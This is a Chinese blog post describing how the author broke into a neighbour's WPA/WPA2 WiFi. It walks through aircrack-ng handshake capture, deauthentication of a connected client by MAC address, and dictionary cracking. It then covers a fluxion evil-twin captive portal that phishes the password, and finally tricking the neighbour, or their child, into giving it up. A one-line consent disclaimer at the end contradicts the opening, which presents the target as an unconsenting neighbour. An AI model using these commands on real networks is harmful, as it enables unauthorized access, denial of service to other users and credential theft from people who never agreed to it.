今天周末遇到了断网,听说是修路挖到了电缆,作为难得的周末没网是不能接受的,这时我看上了邻居家的WiFi,奈何又没密码,只能动手白嫖一下了。
现在的家用路由器支持WiFi一般是wpa/wpa2,没有连接密码我们能够做到的就是对它进行断网,此攻击会给已连接上接入点的用户发送断开包(导致用户和接入点断开连接)。简单说就是对wifi进行d.dos,但是断网并不是我想要的,我的目的是获取到邻居的WiFi密码。所以就是如何获得wifi密码。
一、 wifi万能钥匙,最简单最傻瓜式的wifi密钥分享模式
与此相同的就是微信小程序的WiFi一键连
从结果来看,MERCURY_93DC是行不通了。
二、利用kali获取握手包进行爆破
需要的东西:
a.kali linux系统
b.支持monitor模式的外置网卡(一般的笔记本都支持)
c.密码字典
1、在确保Kali连接上外置网卡下,接下来将网卡开启监听模式。airmon-ng start wlan0
查看附近WiFi,airodump-ng wlan0mon,查到我们需要的目标
2、开始对目标进行监听与及握手包的抓取
airodump-ng -c 13 --bssid 6C:59:40:AA:93:DC -w MERCURY wlan0mon
c:信道
bbsid:对应的bbsid
w:抓取握手包的名字,可以自定义
这里有三个用户连上了WiFi,我们可以选择一个看不顺眼的,给它断网了。这样我们才能在它重新连接的时候抓取到握手包。
aireplay-ng -0 20 -c 3C:86:D1:A2:88:25 -a 6C:59:40:AA:93:DC wlan0mon
-0:发包次数,次数越大断网时间越长
-c: 客户端mac地址
-a: 路由器mac地址
然后等待它重新连接,出现这个情况就是抓取成功。
进去目录找到握手包
3、破解WIFI握手包
使用命令: aircrack-ng -w 密码字典的路径 捕获的.cap文件 ,按Enter开始执行。
这种爆破取决于电脑配置,密码字典强大,还有WiFi密码复杂程度。
三、利用fluxion进行破解WiFi
需要的东西:
a.kali linux系统
b.支持monitor模式的外置网卡
c.kali上安装fluxion
1.安装fluxion: git clone https://github.com/deltaxflux/fluxion.git,进入文件夹运行./fluxion.sh。出现missing的就说明你缺少当前的这些工具,需要更新kali源apt-get update和依次安装这些工具,比如:apt-get install curl
安装好,可以选择中文模式17的界面
2.建立伪AP接入点,因为第二已经说明如何获取到握手包,这里不再叙述,选择1
扫描信道,当出现我们需要的名称可以CTRL+C停止
选择接口
自定义输入握手包,并输入握手包绝对路径
为我们新建的AP选择网络连接方式1
选择中文的钓鱼页面
3.这样我们就建立了一个钓鱼页面,flucxion会自动对目标客户机进行断网,迫使客户机连上我们的钓鱼热点。
打开网络搜索,就会发现存在两个相同名字的热点,有一个就是新建的钓鱼热点。
这样子只需等待用户需要使用网络时发现密码过期,需要从网页上登陆重新输入密码,这时候我们这边可以接收到
密码错误会也会保存起来,并且提示
保存路径:/fluxion/attacks/Captive Portal/pwdlog/
密码正确也会保存,会收到提示
正确密码保存路径:/fluxion/attacks/Captive Portal/netlog/
四、社工
可以学学小明,直接秉承着不要脸的精神,直接去敲门问密码,又或者忽悠邻居家小孩子,说出密码就给糖果。
注:本次测试已经和测试对象沟通好,文章只做研究可用。
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
